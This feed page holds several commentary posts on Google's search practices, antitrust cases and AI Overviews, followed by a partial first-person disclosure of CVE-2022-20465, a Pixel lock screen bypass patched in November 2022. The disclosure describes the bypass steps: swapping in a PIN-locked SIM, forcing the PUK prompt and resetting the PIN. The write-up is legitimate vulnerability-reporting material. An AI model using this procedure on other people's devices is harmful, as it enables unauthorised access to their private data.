Normal view

There are new articles available, click to refresh the page.
Before yesterdayMain stream

Google’s iOS App Inserts Its Own Links Into Webpages

By: Nick Heer
1 December 2024 at 17:17

Barry Schwartz, Search Engine Roundtable:

Google launched a new feature in the Google App for iOS named Page Annotation. When you are browsing a web page in the Google App native browser, Google can “extract interesting entities from the webpage and highlight them in line.” When you click on them, Google takes you to more search results.

This was announced nearly two weeks ago in a subtle forum post. If there was a press release, I cannot find it. It was only picked up by the press thanks to Schwartz’s November 21 article, but those stories were not published until just before the U.S. Thanksgiving long weekend, so this news was basically buried.

Google is now injecting “Page Annotations”, which are kind of like Skimlinks but with search results. The results from a tapped Page Annotation are loaded in a floating temporary sheet, so it is not like users are fully whisked away — but that is almost worse. In the illustration from Google, a person is apparently viewing a list of Japanese castles, into which Google has inserted a link on “Osaka Castle”. Tapping on an injected link will show Google’s standard search results, which are front-loaded with details about how to contact the castle, buy tickets, and see a map. All of those things would be done better in a view that cannot be accidentally swiped away.

Maybe, you are thinking, it would be helpful to easily trigger a search from some selected text, and that is fair. But the Google app already displays a toolbar with a search button when you highlight any text in this app.

Owners of web properties are only able to opt out by completing a Google Form, but you must be signed into the same Google account you use for Search Console. Also, if a property is accessible at multiple URLs — for example, http and https, or www and non-prefixed — you must include each variation separately.

For Google to believe it has the right to inject itself into third-party websites is pure arrogance, yet it is nothing new for the company. It has long approached the web as its own platform over which it has control and ownership. It overlays dialogs without permission; it invented a proprietary fork of HTML and it pushed its adoption for years. It can only do these things because it has control over how people use the web.

⌥ Permalink

Competition Bureau Sues Google for Anti-Competitive Conduct

By: Nick Heer
28 November 2024 at 23:31

Competition Bureau Canada:

The Competition Bureau is taking legal action against Google for anti-competitive conduct in online advertising technology services in Canada. Following a thorough investigation, the Bureau has filed an application with the Competition Tribunal that seeks to remedy the conduct for the benefit of Canadians.

This has become a familiar announcement: a consumer protection agency, somewhere in the world, is questioning whether a giant technology conglomerate has abused its power. A dam has burst.

⌥ Permalink

Mozilla Is Worried About the Proposed Fixes for Google’s Search Monopoly

By: Nick Heer
27 November 2024 at 00:46

Michael Kan, PC Magazine:

Mozilla points to a key but less eye-catching proposal from the DOJ to regulate Google’s search business, which a judge ruled as a monopoly in August. In their recommendations, federal prosecutors urged the court to ban Google from offering “something of value” to third-party companies to make Google the default search engine over their software or devices. 

“The proposed remedies are designed to end Google’s unlawful practices and open up the market for rivals and new entrants to emerge,” the DOJ told the court. The problem is that Mozilla earns most of its revenue from royalty deals — nearly 86% in 2022 — making Google the default Firefox browser search engine.

This is probably another reason why U.S. prosecutors want to jettison Chrome from Google: they want to reduce any benefit it may accrue from trying to fix its illegal search monopoly. But it seems Google’s position in the industry is so entrenched that correcting it will hurt lots of other businesses, too. That does not mean it should not be broken up or that the DOJ’s proposed remedies are wrong, however.

⌥ Permalink

Mozilla Might Suffer the Gravest Consequences of the Google Antitrust Ruling

By: Nick Heer
7 August 2024 at 23:38

Alfonso Maruccia, TechSpot:

Its most recent financials show Mozilla gets $510 million out of its $593 million in total revenue from its Google partnership. This precarious financial position is a side effect of its deal with Alphabet, which made Google the search engine default for newer Firefox installations.

Jason Del Rey, Fortune:

Mozilla is putting on a brave face for now, and not directly addressing the existential threat that the ruling appears to pose.

“Mozilla has always championed competition and choice online, particularly in search,” a spokesperson said in a statement to Fortune on Monday. “We’re closely reviewing the court’s decision, considering its potential impact on Mozilla and how we can positively influence the next steps… Firefox continues to offer a range of search options, and we remain committed to serving our users’ preferences while fostering a competitive market.”

It is possible Mozilla will not be impacted by remedies to Google’s illegal monopoly, the details of which will begin to take shape next month. It seems possible Mozilla could be losing virtually all its revenue, thereby destabilizing the organization behind one of the few non-Chromium browsers and the best documentation of web technologies available anywhere.

Trying to untangle an illegal monopolist is necessarily difficult. This will be a long and painful process for everyone. The short-term resolutions might be ineffectual and irritating, and they may not change Google’s market position. But it is important to get on the record that Google has engaged in illegal conduct to protect its dominance, and so it will be subjected to new oversight and scrutiny. This exercise is worth it because there ought to be limits to market power and anticompetitive behaviour.

⌥ Permalink

⌥ The Reddit and Google Pairing Is One of a Kind

By: Nick Heer
7 August 2024 at 03:51

Since owners of web properties became aware of the traffic-sending power of search engines — most often Google in most places — they have been in an increasingly uncomfortable relationship as search moves beyond ten relevant links on a page. Google does not need websites, per se; it needs the information they provide. Its business recommendations are powered in part by reviews on other websites. Answers to questions appear in snippets, sourced to other websites, without the user needing to click away.

Publishers and other website owners might consider this a bad deal. They feed Google all this information hoping someone will visit their website, but Google is adding features that make it less likely they will do so. Unless they were willing to risk losing all their Google search traffic, there was little a publisher could do. Individually, they needed Google more than Google needed them.

But that has not been quite as true for Reddit. Its discussions hold a uniquely large corpus of suggestions and information on specific topics and in hyper-local contexts, as well as a whole lot of trash. While the quality of Google’s results have been sliding, searchers discovered they could append “Reddit” to a query to find what they were looking for.

Google realized this and, earlier this year, signed a $60 million deal with Reddit allowing it to scrape the site to train its A.I. features. Part of that deal apparently involved indexing pages in search as, last month, Reddit restricted that capability to Google. That is: if you want to search Reddit, you can either use the site’s internal search engine, or you can use Google. Other search engines still display results created from before mid-July, according to 404 Media, but only Google is permitted to crawl anything newer.

It is unclear to me whether this is a deal only available to Google, or if it is open to any search engine that wants to pay. Even if it was intended to be exclusive, I have a feeling it might not be for much longer. But it seems like something Reddit would only care about doing with Google because other search engines basically do not matter in the United States or worldwide.1 What amount of money do you think Microsoft would need to pay for Bing to be the sole permitted crawler of Reddit in exchange for traffic from its measly market share? I bet it is a lot more than $60 million.

Maybe that is one reason this agreement feels uncomfortable to me. Search engines are marketed as finding results across the entire web but, of course, that is not true: they most often obey rules declared in robots.txt files, but they also do not necessarily index everything they are able to, either. These are not explicit limitations. Yet it feels like it violates the premise of a search engine to say that it will be allowed to crawl and link to other webpages. The whole thing about the web is that the links are free. There is no guarantee the actual page will be freely accessible, but the link itself is not restricted. It is the central problem with link tax laws, and this pay-to-index scheme is similarly restrictive.

This is, of course, not the first time there has been tension in how a site balances search engine visibility and its own goals. Publishers have, for years, weighed their desire to be found by readers against login requirements and paywalls — guided by the overwhelming influence of Google.

Google used to require publishers provide free articles to be indexed by the search engine but, in 2017, it replaced that with a model that is more flexible for publishers. Instead of forcing a certain number of free page views, publishers are now able to provide Google with indexable data.

Then there are partnerships struck by search engines and third parties to obtain specific kinds of data. These were summarized well in the recent United States v. Google decision (PDF), and they are probably closest in spirit to this Reddit deal:

GSEs enter into data-sharing agreements with partners (usually specialized vertical providers) to obtain structured data for use in verticals. Tr. at 9148:2-5 (Holden) (“[W]e started to gather what we would call structured data, where you need to enter into relationships with partners to gather this data that’s not generally available on the web. It can’t be crawled.”). These agreements can take various forms. The GSE might offer traffic to the provider in exchange for information (i.e., data-for-traffic agreements), pay the provider revenue share, or simply compensate the provider for the information. Id. at 6181:7-18 (Barrett-Bowen).

As of 2020, Microsoft has partnered with more than 100 providers to obtain structured data, and those partners include information sources like Fandango, Glassdoor, IMDb, Pinterest, Spotify, and more. DX1305 at .004, 018–.028; accord Tr. at 6212:23–6215:10 (Barrett-Bowen) (agreeing that Microsoft partners with over 70 providers of travel and local information, including the biggest players in the space).

The government attorneys said Bing is required to pay for structured data owing to its smaller size, while Google is able to obtain structured data for free because it sends partners so much traffic. The judge ultimately rejected their argument Microsoft struggled to sign these agreements or it was impeded in doing so, but did not dispute the difference in negotiating power between the two companies.

Once more, for emphasis: Google usually gets structured data for free but, in this case, it agreed to pay $60 million; imagine how much it would cost Bing.

This agreement does feel pretty unique, though. It is hard for me to imagine many other websites with the kind of specific knowledge found aplenty on Reddit. It is a centralized version of the bulletin boards of the early 2000s for such a wide variety of interests and topics. It is such a vast user base that, while it cannot ignore Google referrals, it is not necessarily reliant on them in the same way as many other websites are.

Most other popular websites are insular social networks; Instagram and TikTok are not relying on Google referrals. Wikipedia would probably be the best comparison to Reddit in terms of the contribution it makes to the web — even greater, I think — but every article page I tried except the homepage is overwhelmingly dependent on external search engine traffic.

Meanwhile, pretty much everyone else still has to pay Google for visitors. They have to buy the ads sitting atop organic search results. They have to buy ads on maps, on shopping carousels, on videos. People who operate websites hope they will get free clicks, but many of them know they will have to pay for some of them, even though Google will happily lift and summarize their work without compensation.

I cannot think of any other web property which has this kind of leverage over Google. While this feels like a violation of the ideals and principles that have built the open web on which Google has built its empire, I wonder if Google will make many similar agreements, if any. I doubt it — at least for now. This feels funny; maybe that is why it is so unique, and why it is not worth being too troubled by it.


  1. The uptick of Bing in the worldwide chart appears to be, in part, thanks to a growing share in China. Its market share has also grown a little in Africa and South America, but only by tiny amounts. However, Reddit is blocked in China, so a deal does not seem particularly attractive to either party. ↥︎

‘Google Is a Monopolist’ in Search Says U.S. Judge

By: Nick Heer
5 August 2024 at 21:36

Ashley Belanger, Ars Technica:

Google just lost a massive antitrust trial over its sprawling search business, as US district judge Amit Mehta released his ruling, showing that he sided with the US Department of Justice in the case that could disrupt how billions of people search the web.

“Google is a monopolist, and it has acted as one to maintain its monopoly,” Mehta wrote in his opinion. “It has violated Section 2 of the Sherman Act.”

Google will surely contest this finding when its implications are known; Mehta has not announced what actions the government will take against Google.

The opinion is full of details about the precise nature of how Google search and its ads work together, Google’s relationship with Apple and other third parties, and how its business has changed over time. For example, the judge notes Google adjusted ad pricing to maintain a specific growth target, and increased it incrementally to mask it in the typical fluctuations of ad costs. He also cites a finding that “thirteen months of user data acquired by Google is equivalent to over 17 years of data on Bing” in informing the quality of search results. Meanwhile, Google pays Apple a redacted amount through its revenue sharing agreement for default placement in Safari, and it pays for searches performed through Chrome on Apple devices as well. There is a lot more in here, and I fully intend on re-reading the opinion with a bunch of questions I have in mind.

Google really does have great search results a lot of the time, even though it has stumbled in recent years. DuckDuckGo is my default but I find myself often turning to Google for local results, very old results, and news. (DuckDuckGo is powered by Bing, which prioritizes MSN-syndicated versions of articles that I do not want.) Google has not fallen into the same trap as Bing by wholly cluttering the results page. Microsoft still has no taste.

But two things can be true: Google can be the best search engine for most people, most of the time, because it is very good; and, also, Google can have abused its market-leading position to avoid competition and maintain its advertising revenue. Those are not inconsistent with each other. In fact, per the judge’s citation of how long it would take for Bing to amass the same information about user activity as Google does in a year, it is fully possible its quality and its dominance are related, something the judge nods toward. In fact, Google’s position is now so entrenched “it would not lose search revenue if were to significantly reduce the quality of its search product”.

Notably, Mehta did not sanction Google for failing to preserve evidence in the case, writing:

On the request for sanctions, the court declines to impose them. Not because Google’s failure to preserve chat messages might not warrant them. But because the sanctions Plaintiffs request do not move the needle on the court’s assessment of Google’s liability. […]

In cases where the judge found evidence of monopolistic and abusive behaviour, the lack of supporting text messages and other communications would not have made a difference; this is also true, the judge says, for his finding of a lack of anticompetitive behaviour in SA360.

⌥ Permalink

Cool URLs Mean Something

By: Nick Heer
1 August 2024 at 03:55

Tim Berners-Lee in 1998:

Keeping URIs so that they will still be around in 2, 20 or 200 or even 2000 years is clearly not as simple as it sounds. However, all over the Web, webmasters are making decisions which will make it really difficult for themselves in the future. Often, this is because they are using tools whose task is seen as to present the best site in the moment, and no one has evaluated what will happen to the links when things change. The message here is, however, that many, many things can change and your URIs can and should stay the same. They only can if you think about how you design them.

Jay Hoffmann:

Links give greater meaning to our webpages. Without the link, we would lose this significant grammatical tool native the web. And as links die out and rot on the vine, what’s at stake is our ability to communicate in the proper language of hypertext.

A dead link may not seem like it means very much, even in the aggregate. But they are. One-way links, the way they exist on the web where anyone can link to anything, is what makes the web universal. In fact, the first name for URL’s was URI’s, or Universal Resource Identifier. It’s right there in the name. And as Berners-Lee once pointed out, “its universality is essential.”

In 2018, Google announced it was deprecating its URL shortener, with no new links being created after March 2019. All existing shortened links would, however, remain active. It announced this in a developer blog post which — no joke — returns a 404 error at its original URL, which I found via 9to5Google. Google could not bother to redirect posts from just six years ago to their new valid URLs.

Google’s URL shortener was in the news again this month because the company has confirmed it will turn off these links in August 2025 except for those created via Google’s own apps. Google Maps, for example, still creates a goo.gl short link when sharing a location.

In principle, I support this deprecation because it is confusing and dangerous for Google’s own shortened URLs to have the same domain as ones created by third-party users. But this is a Google-created problem because it designed its URLs poorly. It should have never been possible for anyone else to create links with the same URL shortener used by Google itself. Yet, while it feels appropriate for a Google service to be unreliable over a long term, it also should not be ending access to links which may have been created just about five years ago.

By the way, the Sophos link on the word “dangerous” in that last paragraph? I found it via a ZDNet article where the inline link is — you guessed it — broken. Sophos also could not bother to redirect this URL from 2018 to its current address. Six years ago! Link rot is a scourge.

⌥ Permalink

Third-Party Cookies Have Got to Go

By: Nick Heer
30 July 2024 at 02:26

Anthony Chavez, of Google:

[…] Instead of deprecating third-party cookies, we would introduce a new experience in Chrome that lets people make an informed choice that applies across their web browsing, and they’d be able to adjust that choice at any time. We’re discussing this new path with regulators, and will engage with the industry as we roll this out.

Oh good — more choices.

Hadley Beeman, of the W3C’s Technical Architecture Group:

Third-party cookies are not good for the web. They enable tracking, which involves following your activity across multiple websites. They can be helpful for use cases like login and single sign-on, or putting shopping choices into a cart — but they can also be used to invisibly track your browsing activity across sites for surveillance or ad-targeting purposes. This hidden personal data collection hurts everyone’s privacy.

All of this data collection only makes sense to advertisers in the aggregate, but it only works because of specifics: specific users, specific webpages, and specific actions. Privacy Sandbox is imperfect but Google could have moved privacy forward by ending third-party cookies in the world’s most popular browser.

⌥ Permalink

⌥ Anti Trust in Tech

By: Nick Heer
7 June 2024 at 22:02

If you had just been looking at the headlines from major research organizations, you would see a lack of confidence from the public in big business, technology companies included. For years, poll after poll from around the world has found high levels of distrust in their influence, handling of private data, and new developments.

If these corporations were at all worried about this, they are not much showing it in their products — particularly the A.I. stuff they have been shipping. There has been little attempt at abating last year’s trust crisis. Google decided to launch overconfident summaries for a variety of search queries. Far from helping to sift through all that has ever been published on the web to mash together a representative summary, it was instead an embarrassing mess that made the company look ill prepared for the concept of satire. Microsoft announced a product which will record and interpret everything you do and see on your computer, but as a good thing.

Can any of them see how this looks? If not — if they really are that unaware — why should we turn to them to fill gaps and needs in society? I certainly would not wish to indulge businesses which see themselves as entirely separate from the world.

It is hard to imagine they do not, though. Sundar Pichai, in an interview with Nilay Patel, recognised there were circumstances in which an A.I. summary would be inappropriate, and cautioned that the company still considers it a work in progress. Yet Google still turned it on by default in the U.S. with plans to expand worldwide this year.

Microsoft has responded to criticism by promising Recall will now be a feature users must opt into, rather than something they must turn off after updating Windows. The company also says there are more security protections for Recall data than originally promised but, based on its track record, maybe do not get too excited yet.

These product introductions all look like hubris. Arrogance, really — recognition of the significant power these corporations wield and the lack of competition they face. Google can poison its search engine because where else are most people going to go? How many people would turn off Recall, something which requires foreknowledge of its existence, under Microsoft’s original rollout strategy?

It is more or less an admission they are all comfortable gambling with their customers’ trust to further the perception they are at the forefront of the new hotness.

None of this is a judgement on the usefulness of these features or their social impact. I remain perplexed by the combination of a crisis of trust in new technologies, and the unwillingness of the companies responsible to engage with the public. There seems to be little attempt at persuasion. Instead, we are told to get on board because this rocket ship is taking off with or without us. Concerned? Too bad: the rocket ship is shaped like a giant middle finger.

What I hope we see Monday from Apple — a company which has portrayed itself as more careful and practical than many of its contemporaries — is a recognition of how this feels from outside the industry. Expect “A.I.” to be repeated in the presentation until you are sick of those two letters; investors are going to eat it up. When normal people update their phones in September, though, they should not feel like they are being bullied into accepting our A.I. future.

People need to be given time to adjust and learn. If the polls are representative, very few people trust giant corporations to get this right — understandably — yet these tech companies seem to believe we are as enthusiastic about every change they make as they are. Sorry, we are not, no matter how big a smile a company representative is wearing when they talk about it. Investors may not be patient but many of the rest of us need time.

Google Comments on Its Sloppy Summaries

By: Nick Heer
3 June 2024 at 04:20

Liz Reid, head of Google Search, on the predictably bizarre results of rolling out its “A.I. Overviews” feature:

One area we identified was our ability to interpret nonsensical queries and satirical content. Let’s take a look at an example: “How many rocks should I eat?” Prior to these screenshots going viral, practically no one asked Google that question. You can see that yourself on Google Trends.

There isn’t much web content that seriously contemplates that question, either. This is what is often called a “data void” or “information gap,” where there’s a limited amount of high quality content about a topic. However, in this case, there is satirical content on this topic … that also happened to be republished on a geological software provider’s website. So when someone put that question into Search, an AI Overview appeared that faithfully linked to one of the only websites that tackled the question.

This reasoning sounds almost circular in the context of what A.I. answers are supposed to do. Google loves demonstrating how users can enter a query like “suggest a 7 day meal plan for a college student living in a dorm focusing on budget friendly and microwavable meals” and see a grouped set of responses synthesized from a variety of sources. That is surely a relatively uncommon query. I was going to prove that in the same was as Reid did, but when I enter it in Google Trends, I get a 400 error. Even a shortened version is searched so rarely it has no data.

The organic, non-A.I. search results for the long query are plentiful but do not exactly fulfill its specific criteria. Most of the links I saw are not microwave-only, or are simple lists not grouped into particular meal types. Nothing I could find specifically answers the question posed. In order to fulfill the query in the demo video, Google’s search engine has to look through everything it knows and find meals which cook in a microwave, and organize them into a daily plan of different meal types.

But Google is also blaming the novelty of the rocks query and the satirical information directly answering it for the failure of its A.I. features. In other words, it wants to say cool thing about its A.I. stuff is that it can handle unpopular or new queries by sifting through the web and merging together a bunch of stuff it finds. The bad thing about A.I. stuff, it turns out, is basically the same.

Benj Edwards, Ars Technica:

Here we see the fundamental flaw of the system: “AI Overviews are built to only show information that is backed up by top web results.” The design is based on the false assumption that Google’s page-ranking algorithm favors accurate results and not SEO-gamed garbage. Google Search has been broken for some time, and now the company is relying on those gamed and spam-filled results to feed its new AI model.

Reid says Google has made a bunch of changes to address the issues raised, but none of them fix a fundamental shift in A.I. results. Google used to be a directory — admittedly one ranked by mysterious criteria — allowing users to decide which results best fit their needs. It has slowly repositioned itself to being able to answer their queries with authority. Its A.I. answers are a more fulsome realization of features like Featured Snippets and the Answer Box. That is: instead of seeing options which may match their query, Google is now giving searchers singular answers. It has transformed from a referrer into an omniscient responder.

⌥ Permalink

Google Leaked Itself

By: Nick Heer
29 May 2024 at 14:52

Rand Fishkin, writing on the SparkToro blog:

On Sunday, May 5th, I received an email from a person claiming to have access to a massive leak of API documentation from inside Google’s Search division. The email further claimed that these leaked documents were confirmed as authentic by ex-Google employees, and that those ex-employees and others had shared additional, private information about Google’s search operations.

It seems this vast amount of information was published erroneously by Google to a GitHub repository in March, and then removed earlier this month. As Fishkin writes, it is evidence Google has been dishonest in its public statements about how Google Search works.

Fishkin specifically calls attention to media outlets that cover search engines and value the word of Google’s spokespeople. This has been a clever play by Google for years: because its specific ranking criteria have not been publicly known, it can confirm or deny rumours without having to square them with what the evidence shows.

Google’s ranking system seems to be biased in favour of larger businesses and more established websites, according to Fishkin’s analysis. This is not surprising. I am wondering how this fits with the declining quality of Google search results as small, highly-optimized pages full of machine-generated junk seem to rise to the top.

Mike King, iPullRank:

You’d be tempted to broadly call these “ranking factors,” but that would be imprecise. Many, even most, of them are ranking factors, but many are not. What I’ll do here is contextualize some of the most interesting ranking systems and features (at least, those I was able to find in the first few hours of reviewing this massive leak) based on my extensive research and things that Google has told/lied to us about over the years.

“Lied” is harsh, but it’s the only accurate word to use here. While I don’t necessarily fault Google’s public representatives for protecting their proprietary information, I do take issue with their efforts to actively discredit people in the marketing, tech, and journalism worlds who have presented reproducible discoveries. My advice to future Googlers speaking on these topics: Sometimes it’s better to simply say “we can’t talk about that.” Your credibility matters, and when leaks like this and testimony like the DOJ trial come out, it becomes impossible to trust your future statements.

One of the things potentially tracked by Google for search purposes is Chrome browsing data, something Google has denied. The variable in question — chromeInTotal — and the minimal description offered — “site-level Chrome views” — seem open to interpretation. Perhaps this is only recorded in some circumstances, or it depends on user preferences, or is not actually part of search rankings, or is entirely unused. But it certainly suggests aggregate website visits in Chrome, the world’s most popular web browser, are used to inform rankings without users’ knowledge.

Update: Google says the leaked documents are real, but warns “against making inaccurate assumptions”. In fairness, I would like to make more accurate assumptions.

⌥ Permalink

Google’s A.I. Answers Said to Put Glue in Pizza, So Katie Notopoulos Made Some Pizza

By: Nick Heer
25 May 2024 at 05:53

Jason Koebler, 404 Media:

The complete destruction of Google Search via forced AI adoption and the carnage it is wreaking on the internet is deeply depressing, but there are bright spots. For example, as the prophecy foretold, we are learning exactly what Google is paying Reddit $60 million annually for. And that is to confidently serve its customers ideas like, to make cheese stick on a pizza, “you can also add about 1/8 cup of non-toxic glue” to pizza sauce, which comes directly from the mind of a Reddit user who calls themselves “Fucksmith” and posted about putting glue on pizza 11 years ago.

Katie Notopoulos, putting the “business” in Business Insider:

I knew my assignment: I had to make the Google glue pizza. (Don’t try this at home! I risked myself for the sake of the story, but you shouldn’t!)

My timeline on three entirely separate social networks — Bluesky, Mastodon, and Threads — has been chock full of examples of Google’s A.I. answers absolutely eating dirt — or, in one case, rocks — in the face of obvious satire and shitposting. Well, obvious to us. Computers, it seems, have not figured out glue and gasoline are bad for food.

The A.I. answers from Google are not all yucks and chuckles, unfortunately.

Nic Lake:

Yesterday (Part 1) I saw that mushrooms post, and knew something like that was going to get people hurt. I didn’t really think that (CONTENT WARNING) asking how best to deal with depression was going to be next on the “shit I didn’t want to see” Bingo card.

The organizations know. They know that these tools are not ready. They call it a “beta” and feed it to you anyway.

Google is manually removing A.I. results where appropriate, and it is claiming some of the screenshots which have been circulating have been faked in some way without specifying which.

To quote week-ago me:

Given the sliding quality of Google’s results, it seems quite bold for the company to be confident users worldwide will trust its generated answers.

Quite bold, indeed.

I do not expect perfection, but it is downright embarrassing that Google rolled out a product so unreliable and occasionally dangerous it continues to tarnish a reputation already suffering. Google’s Featured Snippets were bad enough. Now it is in the process of rolling out a whole new level of overconfident nonsense to the entire world, fixing it as everyone tests its limits.

⌥ Permalink

Google Is Expanding A.I. Feature Availability in Search

By: Nick Heer
15 May 2024 at 04:39

Liz Reid, head of Google Search:

People have already used AI Overviews billions of times through our experiment in Search Labs. They like that they can get both a quick overview of a topic and links to learn more. We’ve found that with AI Overviews, people use Search more, and are more satisfied with their results.

So today, AI Overviews will begin rolling out to everyone in the U.S., with more countries coming soon. That means that this week, hundreds of millions of users will have access to AI Overviews, and we expect to bring them to over a billion people by the end of the year.

Given the sliding quality of Google’s results, it seems quite bold for the company to be confident users worldwide will trust its generated answers. I am curious to try it when it is eventually released in Canada.

I know what you must be thinking: if Google is going to generate results without users clicking around much, how will it sell ad space? It is a fair question, reader.

Gerrit De Vynck and Cat Zakrzewski, Washington Post:

Google has largely avoided AI answers for the moneymaking searches that host ads, said Andy Taylor, vice president of research at internet marketing firm Tinuiti.

When it does show an AI answer on “commercial” searches, it shows up below the row of advertisements. That could force websites to buy ads just to maintain their position at the top of search results.

This is just one source speaking to the Post. I could not find any corroborating evidence or a study to support this, even on Tinuiti’s website. But I did notice — halfway through Google’s promo video — a query for “kid friendly places to eat in dallas” was answered with an ad for Hopdoddy Burger Bar before any clever A.I. stuff was shown.

Obviously, the biggest worry for many websites dependent on Google traffic is what will happen to referrals if Google will simply summarize the results of pages instead of linking to them. I have mixed feelings about this. There are many websites which game search results and overwhelm queries with their own summaries. I would like to say “good riddance”, but I also know these pages did not come out of nowhere. They are a product of trying to improve website rankings on Google for all searches, and to increase ad and affiliate revenue from people who have clicked through. Neither one is a laudable goal in its own right. Yet anyone who has paid attention to the media industry for more than a minute can kind of understand these desperate attempts to grab attention and money.

Google built entire industries, from recipe bloggers to search optimization experts. What happens when it blows it all up?

Good thing home pages are back.

⌥ Permalink

Accidental $70k Google Pixel Lock Screen Bypass

10 November 2022 at 11:00

I found a vulnerability affecting seemingly all Google Pixel phones where if you gave me any locked Pixel device, I could give it back to you unlocked. The bug just got fixed in the November 5, 2022 security update.

The issue allowed an attacker with physical access to bypass the lock screen protections (fingerprint, PIN, etc.) and gain complete access to the user’s device. The vulnerability is tracked as CVE-2022-20465 and it might affect other Android vendors as well. You can find my patch advisory and the raw bug report I have sent to Google at feed.bugs.xdavidhu.me.

Chapter 1:
forgetting my SIM PIN

I’m really glad that this bug is getting fixed now. This was the most impactful vulnerability that I have found yet, and it crossed a line for me where I really started to worry about the fix timeline and even just about keeping it as a “secret” myself. I might be overreacting, but I mean not so long ago the FBI was fighting with Apple for almost the same thing.

I found this bug after 24 hours of travelling. Arriving home, my Pixel 6 was on 1% battery. I was in the middle of sending a series of text messages when it died. I think it was some sort of joke that I couldn’t properly finish, so it felt pretty awkward. I rushed to the charger and booted the phone back up.

The Pixel started up and asked for the SIM’s PIN code. I usually knew it, but this time I couldn’t remember it correctly. I was hoping I might figure it out so I tried a few combinations, but I ended up entering 3 incorrect PINs, and the SIM card locked itself. It now needed the PUK code to unlock and work again.

After jumping into my closet and somehow finding the SIM’s original packaging, I scratched off the back and got the PUK code. I entered the PUK code on the Pixel and it asked me to set a new PIN. I did it, and after successfully finishing this process, I ended up on the lock screen. But something was off:

The unusual fingerprint icon and Pixel is starting text

It was a fresh boot, and instead of the usual lock icon, the fingerprint icon was showing. It accepted my finger, which should not happen, since after a reboot, you must enter the lock screen PIN or password at least once to decrypt the device.

After accepting my finger, it got stuck on a weird “Pixel is starting…” message, and stayed there until I rebooted it again.

I mentally noted that this was weird and that this might have some security implications so I should look at it later. To be honest I don’t really like finding behaviors like this when I am not looking for them explicitly, because when this happens, I am prone to feeling obsessively responsible to investigate. I start to feel like I must make sure that there is no serious issue under the hood that others missed. In this case, well, there was.

Chapter 2:
what just happened?

As I promised myself, I started looking at this behavior again the next day. After rebooting the phone, putting in the incorrect PIN 3 times, entering the PUK, and choosing a new PIN, I got to the same “Pixel is starting…” state.

I played with this process multiple times, and one time I forgot to reboot the phone, and just started from a normal unlocked state, locked the device, hot-swapped the SIM tray, and did the SIM PIN reset process. I didn’t even realize what I was doing.

As I did before, I entered the PUK code and choose a new PIN. This time the phone glitched, and I was on my personal home screen. What? It was locked before, right?

This was disturbingly weird. I did it again. Lock the phone, re-insert the SIM tray, reset the PIN… And again I am on the home screen. WHAT?

My hands started to shake at this point. WHAT THE F**K? IT UNLOCKED ITSELF?

After I calmed down a little bit, I realized that indeed, this is a got damn full lock screen bypass, on the fully patched Pixel 6. I got my old Pixel 5 and tried to reproduce the bug there as well. It worked too.

Here is the unlock process in action:

Since the attacker could just bring his/her own PIN-locked SIM card, nothing other than physical access was required for exploitation. The attacker could just swap the SIM in the victim’s device, and perform the exploit with a SIM card that had a PIN lock and for which the attacker knew the correct PUK code.

Chapter 3:
Google’s response

I sent in the report. It was I think the shortest report of mine yet. Only took 5 simple steps.

Google (more precisely the Android VRP) triaged & filed an internal bug within 37 minutes. That was really impressive. Unfortunately, after this, the quality and the frequency of the responses started to deteriorate.

During the life of this bug, since the official bug ticket was not too responsive, I sometimes got some semi-official information from Googlers. I actually prefer to only get updates on the official channel, which is the bug ticket and which I can disclose, but since I was talking with some employees, I picked up on bits and pieces.

Also, it’s worth mentioning here that before reporting, I checked the Android VRP reward table which states that if you report a lock screen bypass that would affect multiple or all [Pixel] devices, you can get a maximum of $100k bounty. Since I ticked all of the required boxes, I sort of went into this thinking that this bug has a strong chance of actually getting rewarded $100k.

After it got triaged, there was basically a month of silence. I heared that it might actually be closed as a duplicate. Apparently somebody already reported it beforehand, even though it was my report that actually made them take action. Something seemingly went wrong with processing the original report. Indeed, 31 days after reporting, I woke up to the automated email saying that “The Android Security Team believes that this is a duplicate of an issue previously reported by another external researcher.” This was a bit of a signature bug bounty moment, a bug going from $100k to $0. I couldn’t really do anything but accept the fact that this bug is now a duplicate and will not pay.

Almost two months have passed after my report, and there was just silence. On day 59 I pinged the ticket, asking for a status update. I got back a template response saying that they are still working on the fix.

Fast forward to September, three months after my report. I was in London, attending Google’s bug hunter event called ESCAL8. The September 2022 patch just came out, I updated my phone and one night in my hotel room I tried to reproduce the bug. I was hoping that they might have fixed it already. No. I was still able to unlock the phone.

This hotel room incident really freaked me out. I felt like I worry and care so much more about the bug getting fixed than Google themselves. Which should not be the case. Even if I am overreacting. So that night I started reaching out to other Googlers who were at the event with us.

The next day I ended up explaining my situation to multiple people, and I even did a live demo with some of the Pixels inside Google’s office. That was an experience. We didn’t have a SIM ejection tool. First, we tried to use a needle, and somehow I managed to cut my finger in multiple places, and my hand started bleeding. I had a Google engineer put a band-aid on my finger. (Who else can say that??) Since the needle didn’t work, we started to ask around and one very kind woman gave us her earrings to try with. It worked! We swapped the SIMs, and manage to, with some difficulties, unlock the devices. Now I felt better that people seemed to care about the issue.

Me in the London Google office a day after I cut my finger me the day after cutting my finger

I put a disclosure deadline for October 15, but the Android VRP team responded by saying that the bug will not be patched in October yet. They were aiming at December. This seemed way too far for me, considering the impact. I decided to stick with my October deadline.

After talking to some Googlers about this October deadline, a member of the Android VRP team personally commented on the bug ticket, and asked me to set up a call to talk about the bug, and share feedback. We had a Meet call with multiple people, and they were very nice and listened to my whole story about being in the dark for months, only getting template reponses (even for the $100k -> $0 duplicate), and overall feeling like I care more about this bug than Google. They said that the fix is now planned to go out in November, not December. Still, my deadline was set to October.

Two weeks after our call, I got a new message that confirmed the original info I had. They said that even though my report was a duplicate, it was only because of my report that they started working on the fix. Due to this, they decided to make an exception, and reward $70,000 for the lock screen bypass. I also decided (even before the bounty) that I am too scared to actually put out the live bug and since the fix was less than a month away, it was not really worth it anyway. I decided to wait for the fix.

You can read the full conversation on feed.bugs.xdavidhu.me.

All in all, even though this bug started out as a not-too-great experience for me, the hacker, after I started “screaming” loudly enough, they noticed, and really wanted correct what went wrong. Hopefully they treated the original reporter(s) fairly as well. In the end, I think Google did pretty well, although the fix timelime still felt long for me.

But I’ll let you be the judge of it.

Chapter 4:
What caused the bug?

Since Android is open source, the commit fixing this issue with all of the code changes is visible publicly:

Screenshot of the commit message

The first thing that surprised me when I first looked at this commit was the number of files changed. I previously thought that this bug would only have a simple one-liner fix, removing the incorrect line of code responsible for triggering an unlock. But it was not that simple:

Screenshot of the commit's changed files section

After reading the commit message and the code changes, I think I was able to get a rough picture of what happened under the hood. Keep in mind that I am not an Android engineer, so I want to keep this high level.

